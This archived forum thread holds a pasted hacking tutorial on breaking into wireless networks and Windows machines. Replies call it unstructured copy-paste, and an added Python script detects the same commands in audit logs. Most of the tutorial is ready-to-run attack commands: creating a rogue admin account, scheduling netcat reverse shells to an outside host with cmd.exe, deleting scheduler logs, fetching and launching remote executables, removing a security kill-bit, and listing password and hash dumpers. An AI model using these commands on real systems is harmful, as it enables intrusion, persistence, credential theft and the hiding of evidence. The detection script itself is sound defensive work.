Full Version: Kiddie Method
No Dice
Would anyone like to constructively critique this Holy script kiddie tutorial that I conjured up... I'm trying to explain the methods involved and the step-by-step procedures that aid an attacker in breaching a wireless access point and the mystical network that Lay'th behind it.

Yes, there is mad cut & paste going on... but, I really don't care about being flamed for script kiddie shit... I'm learning the methods granted to me under the White-Hat act of 1776.. Meaning, I've gotta plan...

Credit given where known...

Legal shit: I'm just trying to learn the methods of an attacker.... Please do not try this at home...

NoDice

Crack WEP in 10 mins....

http://www.hackingdefined.com/movies/whax-aircrack-wep.html

URL: http://www.crimemachine.com/Tuts/Flash/wepcracking.html

Or

Crack WPA...

URL: http://www.crimemachine.com/Tuts/Flash/WPA.html

Download: http://www.crimemachine.com/Tuts/Flash/WPA.swf

Tools:
Auditor @ http://new.remote-exploit.org/index.php/Auditor_mirrors

WHAX @ http://ftp.rz.tu-bs.de/pub/mirror/ftp.whop...-3.0-200705.iso
MD5sum @ http://www.iwhax.net/whax-3.0-200705.md5.txt

Metasploit @ http://www.metasploit.com/projects/Framework/downloads.html
Win32 Cygwin Installer for Windows.

After you connect to the router:

You'll have to scan for vulnerabilities... Using any one of these tools:

Xscan -- http://www.xfocus.org/programs/200507/18.html

Tenable Newt - Nessus For Windows -- http://www.tenablesecurity.com/products/newt.shtml

Others:

Shadow
Retina
ISS
GFi
Nikto - Cgi

Use Metasploit to attack the exploit <<< Gain root <<<<

Metasploit Documentation -- http://www.metasploit.com/projects/Framewo...umentation.html

Here are some CMD quickies --

A handy collection of command line tools
cpuinfo.exe - gets the processor type and CPU clocking speed (mhz)
fport.exe - shows open ports and the process that owns the port
iplist.exe - enumerates the ip's of the computer
md5.exe - gets the md5 hash of a file
pw2kget.exe - for win2k gets the password of the currently logged on user
pwreveal.exe - gets the passwords of any window that has a ****** editbox
regshell.exe - a commandline registry explorer/editor
resolve.exe - a commandline URL resolver
sendmail.exe - a commandline email sender
uptime.exe - gets the machines current uptime
xwhois - advanced whois lookup
Screencap.exe - makes a screenshot of the screen and saves it to screenshot.bmp
CMDget.exe - Downloads a file from a website from user provided parameters
webscr.exe - creates a snapshot from the webcam and saves it
shutd.exe - program that forces shutdown/reboot of machine
bnc.exe - bnc for windows (see bnc.cfg)
clslog.exe - clears app/security/system logs XP/NT/2k
enum.exe - enumerates IPC$ share to collect information
winfo.exe - enumerates IPC$ share to collect information
FTPd.exe - small ftp server for dos (see slimftpd.conf)
Global.exe - process dos command on all disc/subdirs
iCmd.exe - telnet server 98/xp/nt/2k
iislog.exe - clears IIS logs
Info.exe - gets system information
ispc.exe - spawns shell on hacked IIS (put idq.dll on remote script dir)
nc.exe - netcat
pv.exe - process manager for dos
Pwdump.exe - dumps SAM hashes
scrnmode.exe - change screen mode from dos
unrar.exe - unrar for dos
wget.exe - wget for windows
wizmo.exe - command tool (see w.txt)
dwpp.exe - dial up password grabber
winrelay.exe - relay tcp/udp connections
getad.exe - escalate to admin user in w2k
pipeup.exe - escalate to admin user in w2k
dnsid - identify remote dns server
rinetd.exe - see rinetd.txt

Some tricks once you gain a remote shell:


So you got a command shell prompt with your '0day s00p3r h4x0rin .c skrypt'
and you don't know what the (filtered) a command prompt is cuz you don't know shit about DOS
and can't do anything without a pretty point-n-click GUI interface, and need to get your
UPX/hex-edited/undetected s00per trojan loaded onto it and be a real hax0r.

+++ r00tin' NT
- 0x01. The Basics
+ What are net commands?
+ What are some net commands?
+ What is NetBIOS?
+ Creating a local admin account.
+ How to transfer files to and from.
+ How do I execute those files remotely?


0x01. The Basics - What are net commands?
`````````````````````````````````````````
What are net commands exactly? Net commands are commands used to show information regarding
a server or network, which can include information on the servers, networks, shares, and connections.
Other commands let you edit user accounts, groups, and other configuration
types.


0x01. The Basics - What are some net commands?
``````````````````````````````````````````````
What are some net commands? There are various net commands which you can use to view server info.
Some of these net commands would include the ever popular NET use, NET share and NET view. But these
aren't the only net commands available. There is a wide variety of net commands, and they are as follows:

- NET Accounts
- NET Computer
- NET Config Server
- NET Config Workstation
- NET Continue
- NET File
- NET Group
- NET Help
- NET Helpmsg
- NET Localgroup
- NET Name
- NET Pause
- NET Print
- NET Send
- NET Session
- NET Share
- NET Statistics Server
- NET Statistics Workstation
- NET Stop
- NET Time
- NET Use
- NET User
- NET Ver
- NET View

Net commands are great ways to spy on hacked Windows NT servers because you're checking on the network's
status. The most widely used net commands in NT hacking are NET View, NET Share, and NET Use because they
each do a certain thing which can be used for attacking. NET View is used to display a list of
resources being shared on the attacked computer; NET Share displays a list of information about
all the resources that are being shared on the attacked computer and can also be used to create network
shares; and last but not least NET Use displays a list of connected computers and also has
options for connecting and disconnecting from previously made shares. With those 3 commands, you have the
ability to do an attack called NetBIOS hacking.


0x01. The Basics - Creating a local admin account and a backup shell.
``````````````````````````````````````````````````
First off, I always start off with making myself an admin on the computer just in case the shell is lost.
Add your name to admin group:
net user [username] [password] /add
net localgroup administrators [username] /add
( C:\WINNT\System32>net user GOD 0wned /add )
( C:\WINNT\System32>net localgroup administrators GOD /add )

***From muts from whitehat.co.il 8/19/04 *************************************************************
Once I had the shell, I had to create some "Backup Shells" in case the connection gets severed.
There's nothing worse than losing the only single connection to a penetrated machine.
I did this using the "at" command, sending myself a NetCat shell every 15 minutes.
I found myself smiling every 15 minutes.

Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS>time
time
The current time is: 0:18:13.01
Enter the new time:

C:\WINDOWS>at 0:19 ""nc.exe -v illmob.reversedns.com 443 -d -e cmd.exe""
at 0:19 ""nc.exe -v illmob.reversedns.com 443 -d -e cmd.exe""
Added a new job with job ID = 1
********************************************************************************
*******************
2nd way .. does the same thing but more complicated
**** added 6/20/05
rename your nc.exe to services.exe (services.exe cannot be killed by anyone.)
C:\>echo services.exe -v illmob.reversedns.com 443 -L -d -e cmd.exe >c:\netcat.cmd
C:\>schtasks /create /tn rb /tr "c:\netcat.cmd" /sc minute /mo 1 /ru Administrator /rp p455w0rd && schtasks /change /tn rb /ru ""
SUCCESS: The scheduled task "rb" has successfully been created.
INFO: The run as user name for the scheduled task "rb" will be changed to "NT AUTHORITY\SYSTEM".
SUCCESS: The parameters of scheduled task "rb" have been changed.

u got a reverse connecting netcat shell that runs as SYSTEM and cannot be killed

*WARNING*
with both type make sure you clean up behind you
C:\>net stop "Task Scheduler"
C:\>del %SystemRoot%\SchedLgU.Txt
C:\>net start "Task Scheduler"

0x01. The Basics - How to transfer files to and from.
`````````````````````````````````````````````````````
Now's a good time to transfer some files.
Here are some good methods of transferring files that I use:

1. Open the c: drive up for file sharing/transferring
C:\>NET SHARE shareME=C:
which u can connect to in your browser window \\(consenting) computer\shareME
or type in YOUR dos prompt
c:>NET USE x: \\(consenting) computer\shareME /user:GOD

2. TFTP transfers (u need to have a TFTP server running on your computer)
http://www.solarwinds.net/Tools/Free_tools/TFTP_Server/
TFTP [-i] YOURIP [GET | PUT] source [destination]
C:\WINNT\SYSTEM32>TFTP -i 127.0.0.1 GET SAM c:\rootedSAMS

3. from a command prompt echo ftp commands into a .bat file and execute it
echo user <USERNAME> >>c:\$.tmp
echo <PASSWORD> >>c:\$.tmp
echo lcd c:\windows >>c:\$.tmp
echo binary >>c:\$.tmp
echo get <FILENAME.EXE> >>c:\$.tmp
echo quit >>c:\$.tmp
ftp -v -i -n -s:c:\$.tmp <FTP SITE> c:\$$.tmp
<FILENAME.EXE>
del c:\$.tmp
del c:\$$.tmp

4. I have created a commandline webdownloader which allows you to grab a file from a website and execute it.
It's more reliable when transferring files (FTP servers have timeouts, TFTP uses UDP packets so it fails a lot).
http://illmob.org/files/illmob/cmdget.zip
u need to get it on the server.exe using the above choices then you can use it normally
cmdget http://blah.com/trojan.exe c:\0wned.exe
"Well, how would I get your exe onto the hacked server, illwill, you dumbass?" you might ask.
Well, you could use this program brainbuster made... basically it's a GUI front-end to create a debug script
that you can paste into a shell line by line that will create a bat file that will re-compile the script into .exe
http://illmob.org/files/0day/exe2txt.zip

***Added from 101 on GSO forums 5/31/04
A small tip now if you wanna use SecureCRT in listening mode to then be able to copy-paste the huge .txt without problems:
-*example*-
your localip = 192.168.0.2
run a listening netcat1 : nc.exe -vv -L -p 12345 -t -e cmd.exe -s 192.168.0.2
With SecureCRT , do a simple telnet connection on 192.168.0.2:12345
(you'll have a shell of course on your own computer through SecureCRT)
Open now another listening netcat2 through this local sCRT shell; you'll finally be able
to copy-paste this huge txt if a (consenting) computer spawns a shell to this netcat2
*****


*I would also recommend dropping a copy of netcat onto the server because you can do a shitload of stuff with it
like file transfers .. you would start nc listening on a port and then on your computer
c:\>nc (vic_ip) (vic_port) < file.exe

-------------------- SNIP----------------------

echo Dim HTTPGET >>c:\dl.vbs && echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>c:\dl.vbs && echo HTTPGET.Open "GET", "http://www.illmob.org/test.exe", false >>c:\dl.vbs && echo HTTPGET.Send >>c:\dl.vbs && echo DataBin = HTTPGET.ResponseBody >>c:\dl.vbs && echo Const adTypeBinary=1 >>c:\dl.vbs && echo Const adSaveCreateOverWrite=2 >>c:\dl.vbs && echo Dim SendBinary >>c:\dl.vbs && echo Set SendBinary = CreateObject("ADODB.Stream") >>c:\dl.vbs && echo SendBinary.Type = adTypeBinary >>c:\dl.vbs && echo SendBinary.Open >>c:\dl.vbs && echo SendBinary.Write DataBin >>c:\dl.vbs && echo SendBinary.SaveToFile "c:\test.exe", adSaveCreateOverWrite >>c:\dl.vbs && cscript //Nologo /B c:\dl.vbs && start c:\test.exe && del /s c:\dl.vbs

------------------END SNIP----------------------

oh they patched their system for the adodb stream? ha!
just paste this simple in the shell first
and you'll be able to do it in no time

-------------------- SNIP----------------------
echo Windows Registry Editor Version 5.00 >>c:\fix.reg && echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}] >>c:\fix.reg && echo "Compatibility Flags"=- >>c:\fix.reg && regedit /s c:\fix.reg
------------------END SNIP----------------------




Method #2 ftp downloading
change the ftp.blah.com to your own ftp+dir and add your username/pass

-------------------- SNIP----------------------

echo user USERNAME >>c:\$.tmp && echo PASS >>c:\$.tmp && echo binary >>c:\$.tmp && echo get test.exe >>c:\$.tmp && echo quit >>c:\$.tmp && ftp -v -i -n -s:c:\$.tmp ftp.blah.com c:\$$.tmp && start c:\test.exe && del c:\$.tmp && del c:\$$.tmp

------------------END SNIP----------------------



Method #3 tftp downloading
you need a tftp server running on yourself
change the yourserver.com to your ip or dns name

-------------------- SNIP----------------------

tftp -i yourserver.com get yourfile.exe && start yourfile.exe
------------------END SNIP----------------------


0x01. The Basics - How do I execute those files remotely?
`````````````````````````````````````````````````````````
Having trouble trying to execute files remotely?
Try PSEXEC http://www.sysinternals.com/ntw2k/freeware/psexec.shtml/
psexec -u [username] -p [password] [command]
if I created a user "GOD" with the password "0wn3d"
C:\>psexec -u GOD -p 0wn3d blah.exe
or if you wanna have their TFTP connect back to u and retrieve a file
c:\>psexec -u GOD -p 0wn3d "tftp -i 127.0.0.1 get trojan.exe"

NOTE: Psexec will only work if you add an administrator user first,
and if the computer doesn't have remote administration disabled,
or one of the ports firewalled out.
Or try Remoxec http://securityfriday.com/ToolDownload/Rem...emoxec_doc.html
Remoxec executes a program using DCOM. Just supply an IP, USER, PASS, and the EXE you wanna execute.

Credit - illwill

Need to puff puff a lil'bit over here.....

«·´`·.(*·.¸(`·.¸ ¸.·´)¸.·*).·´`·»


«·´¨*·.¸¸.*Kiddie*.¸¸.·´`·»


«·´`·.(¸.·´(¸.·* *·.¸)`·.¸).·´`·»
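Every step the pasted tutorial walks through (net user / net localgroup to add an admin, at and schtasks to relaunch netcat with -e cmd.exe, deleting SchedLgU.Txt, tftp/ftp/VBScript downloads, the ADODB.Stream kill-bit registry edit, sharing a drive root, psexec with credentials) is a literal command line, and a defender with command-line auditing turned on can hunt for exactly those strings. The following is an added example, not code from the thread or from any of the authors it quotes, that runs such detections over constructed sample records; the tab-separated record format, the host WS01, the user names and the listener hostname listener.example.net are assumptions.

```python
"""Hunt for the post-compromise command lines quoted in the thread in process
command-line audit records (admin account creation, at/schtasks netcat shells,
Task Scheduler log deletion, tftp/ftp/VBScript downloads, ADODB.Stream
kill-bit removal, drive-root shares, psexec with credentials).

Added example for this page, not code from the thread or its authors.
Assumed (constructed) record format: "<timestamp>\t<host>\t<user>\t<cmdline>",
the fields you would export from Sysmon Event ID 1 or Security 4688 with
command-line logging enabled.
"""
import re
from dataclasses import dataclass
from typing import Iterable


@dataclass
class Alert:
    ts: str
    host: str
    rule: str
    detail: str


# (rule name, pattern). Patterns follow the exact command lines shown in the
# thread; matching is case-insensitive because cmd.exe is.
RULES = [
    ("local_user_created",
     re.compile(r"\bnet\s+user\s+(?P<user>\S+)\s+\S+\s+/add\b", re.I)),
    ("local_admin_added",
     re.compile(r"\bnet\s+localgroup\s+administrators\s+(?P<user>\S+)\s+/add\b", re.I)),
    # nc.exe, or a renamed copy such as services.exe, told to hand out cmd.exe
    ("netcat_shell_spawn",
     re.compile(r"\S+\.exe\b.*\s-e\s+cmd\.exe\b", re.I)),
    ("at_job_scheduled",
     re.compile(r"(^|[\s>])at\s+\d{1,2}:\d{2}\s+\S", re.I)),
    # /ru "" re-targets the task to NT AUTHORITY\SYSTEM, as the thread shows
    ("schtasks_run_as_system",
     re.compile(r'\bschtasks\s+/(create|change)\b.*\s/ru\s+""', re.I)),
    ("scheduler_log_deleted",
     re.compile(r"\bdel\s+\S*SchedLgU\.Txt\b", re.I)),
    ("tftp_binary_fetch",
     re.compile(r"\btftp\s+-i\s+\S+\s+get\s+\S+", re.I)),
    ("ftp_scripted_fetch",
     re.compile(r"\bftp\b[^&|]*\s-s:\S+", re.I)),
    ("vbs_http_downloader",
     re.compile(r"Microsoft\.XMLHTTP|ADODB\.Stream", re.I)),
    ("adodb_killbit_removed",
     re.compile(r"ActiveX Compatibility\\\{00000566-0000-0010-8000-00AA006D2EA4\}", re.I)),
    ("drive_root_shared",
     re.compile(r"\bnet\s+share\s+\S+=[a-z]:\\?(\s|$)", re.I)),
    ("psexec_with_credentials",
     re.compile(r"\bpsexec\b.*\s-u\s+\S+\s+-p\s+\S+", re.I)),
]

# Constructed sample records modelled on the thread's commands; host, user
# names and the listener hostname are made up. The "net use" line is benign.
SAMPLE_RECORDS = [
    ("2005-06-20T00:17:50", "WS01", "jsmith", r"net user GOD 0wned /add"),
    ("2005-06-20T00:17:55", "WS01", "jsmith", r"net localgroup administrators GOD /add"),
    ("2005-06-20T00:18:13", "WS01", "jsmith",
     r'at 0:19 ""nc.exe -v listener.example.net 443 -d -e cmd.exe""'),
    ("2005-06-20T00:20:00", "WS01", "SYSTEM",
     r'schtasks /create /tn rb /tr "c:\netcat.cmd" /sc minute /mo 1 /ru Administrator /rp p455w0rd && schtasks /change /tn rb /ru ""'),
    ("2005-06-20T00:21:00", "WS01", "SYSTEM", r"del %SystemRoot%\SchedLgU.Txt"),
    ("2005-06-20T00:22:00", "WS01", "SYSTEM", r"tftp -i 10.0.0.5 GET SAM c:\rootedSAMS"),
    ("2005-06-20T00:23:00", "WS01", "jsmith", r"net use x: \\fileserver\public"),
    ("2005-06-20T00:24:00", "WS01", "jsmith", r"net share shareME=C:"),
]
SAMPLE_LOG = "\n".join("\t".join(r) for r in SAMPLE_RECORDS) + "\n"


def scan(lines: Iterable[str]) -> list[Alert]:
    """Run every rule over every record. Also correlate 'net user /add' with a
    later 'net localgroup administrators /add' for the same account on the
    same host, the exact two-step sequence the thread recommends."""
    alerts: list[Alert] = []
    created: dict[tuple[str, str], str] = {}   # (host, account) -> creation time
    for line in lines:
        if not line.strip():
            continue
        ts, host, _user, cmd = line.rstrip("\r\n").split("\t", 3)
        for name, rx in RULES:
            m = rx.search(cmd)
            if not m:
                continue
            alerts.append(Alert(ts, host, name, cmd))
            if name == "local_user_created":
                created[(host, m["user"].lower())] = ts
            elif name == "local_admin_added" and (host, m["user"].lower()) in created:
                alerts.append(Alert(ts, host, "new_local_admin_account",
                                    f"{m['user']} created at {created[(host, m['user'].lower())]}"))
    return alerts


def rule_names(lines: Iterable[str]) -> list[str]:
    return [a.rule for a in scan(lines)]


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG.splitlines()):
        print(f"{a.ts}  {a.host}  {a.rule:25}  {a.detail}")
```

The rules only see what process-creation auditing records, so they depend on command-line logging being enabled before the intrusion; the tutorial's own cleanup step (stopping the scheduler and deleting SchedLgU.Txt) is precisely the kind of action the scheduler_log_deleted rule exists to flag. The correlation in scan() is deliberately keyed on host and account name rather than on time, because the two net commands in the tutorial are typed seconds apart but could just as well be spread across sessions.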
brOmstar
plz move to trashcan...thx
blahplok
sorry, confused...

QUOTE
plz move to trashcan...thx
^_*
Partizaan
It's totally unstructured - non-related copy-pastes...
Many things are like already 10 times discussed here.

This is NOT called a tutorial
Invision Power Board © 2001-2005 Invision Power Services, Inc.